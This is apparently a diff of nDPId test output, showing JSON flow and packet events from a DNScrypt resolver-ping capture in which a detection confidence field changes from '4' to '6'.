01143{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":326,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":129,"flow_packet_id":1,"flow_last_seen":946739317496,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":946739317496,"pkt":"REREREREZmZmZmZmCABFAAIcbs5AAL0R7doKAAABLUxxH8mFAbsCCGFBZBcBAAABAAAAAAABATINZG5zY3J5cHQtY2VydANkbnMEc2VieQJpbwAAEAABAAAAAAAAAAAAAcgADAHEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00658{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":326,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":129,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739317496,"flow_last_seen":946739317496,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739317496,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.76.113.31","src_port":51589,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
+00658{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":326,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":129,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739317496,"flow_last_seen":946739317496,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739317496,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.76.113.31","src_port":51589,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00601{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":327,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":130,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739317496,"flow_last_seen":946739317496,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739317496,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.76.113.31","src_port":43776,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
01143{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":327,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":130,"flow_packet_id":1,"flow_last_seen":946739317496,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":946739317496,"pkt":"REREREREZmZmZmZmCABFAAIcbs9AAL0R7dkKAAABLUxxH6sAAbsCCGFBZBUBAAABAAAAAAABATINZG5zY3J5cHQtY2VydANkbnMEc2VieQJpbwAAEAABAAAAAAAAAAAAAcgADAHEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00658{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":327,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":130,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739317496,"flow_last_seen":946739317496,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739317496,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.76.113.31","src_port":43776,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
+00658{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":327,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":130,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739317496,"flow_last_seen":946739317496,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739317496,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.76.113.31","src_port":43776,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00605{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":328,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":131,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739317496,"flow_last_seen":946739317496,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739317496,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.76.113.31","src_port":59707,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
02426{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":328,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":131,"flow_packet_id":1,"flow_last_seen":946739317496,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946739317496,"pkt":"REREREREZmZmZmZmCABFAAXcbtAgAL0RChkKAAABLUxxH+k7AbsGBMYOZBQBAAABAAAAAAABATINZG5zY3J5cHQtY2VydANkbnMEc2VieQJpbwAAEAABAAAAAAAAAAAABcQADAXAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":328,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":131,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739317496,"flow_last_seen":946739317496,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739317496,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.76.113.31","src_port":59707,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":328,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":131,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739317496,"flow_last_seen":946739317496,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739317496,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.76.113.31","src_port":59707,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
00605{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":329,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":132,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739317496,"flow_last_seen":946739317496,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739317496,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.76.113.31","src_port":52069,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02426{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":329,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":132,"flow_packet_id":1,"flow_last_seen":946739317496,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946739317496,"pkt":"REREREREZmZmZmZmCABFAAXcbtEgAL0RChgKAAABLUxxH8tlAbsGBOPgZBgBAAABAAAAAAABATINZG5zY3J5cHQtY2VydANkbnMEc2VieQJpbwAAEAABAAAAAAAAAAAABcQADAXAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":329,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":132,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739317496,"flow_last_seen":946739317496,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739317496,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.76.113.31","src_port":52069,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
+00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":329,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":132,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739317496,"flow_last_seen":946739317496,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739317496,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.76.113.31","src_port":52069,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00225{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":330,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":946739317496} 00420{"packet_event_id":1,"packet_event_name":"packet","packet_id":330,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":946739317496,"pkt":"REREREREZmZmZmZmCABFAABQbtEAub0RLusKAAABLUxxHwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 00225{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":331,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":946739317496} 
@@ -673,55 +673,55 @@ 00710{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":337,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":128,"flow_packet_id":2,"flow_last_seen":946739317829,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":224,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":224,"pkt_l4_len":190,"thread_ts_msec":946739317829,"pkt":"ZmZmZmZmRERERERECABFAADSA+lAAC8R6AotTHEfCgAAAQG71+MAvjWuZBaBgAABAAEAAAAAATINZG5zY3J5cHQtY2VydANkbnMEc2VieQJpbwAAEAABwAwAEAABAABwgAB9fEROU0MAAgAAr5zEv1WGx7jem2pK2nflqiaMVF6rzF7WHGlvrWl\/ySW6UfM8aTB84zwXL6LFGFBJtiDl\/1MLBjf7\/4+Tj2baBU4DeMBZ\/3\/bX+\/ckKf+At437jBg5+agLK3mfgxAT218TgN4wFn\/f9sAAAABX1NRj19Uow8="} 00602{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":338,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":133,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739318038,"flow_last_seen":946739318038,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739318038,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"151.80.222.79","src_port":53876,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01143{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":338,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":133,"flow_packet_id":1,"flow_last_seen":946739318038,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":946739318038,"pkt":"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"} 
-00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":338,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":133,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739318038,"flow_last_seen":946739318038,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739318038,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"151.80.222.79","src_port":53876,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":338,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":133,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739318038,"flow_last_seen":946739318038,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739318038,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"151.80.222.79","src_port":53876,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00606{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":339,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":134,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739318038,"flow_last_seen":946739318038,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739318038,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"151.80.222.79","src_port":45497,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
02426{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":339,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":134,"flow_packet_id":1,"flow_last_seen":946739318038,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946739318038,"pkt":"REREREREZmZmZmZmCABFAAXc+3MgAL0RpkAKAAABl1DeT7G5AbsGBKXWXC8BAAABAAAAAAABATINZG5zY3J5cHQtY2VydAdvcGVubmljBGkycGQDeHl6AAAQAAEAAAAAAAAAAAAFvwAMBbsAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
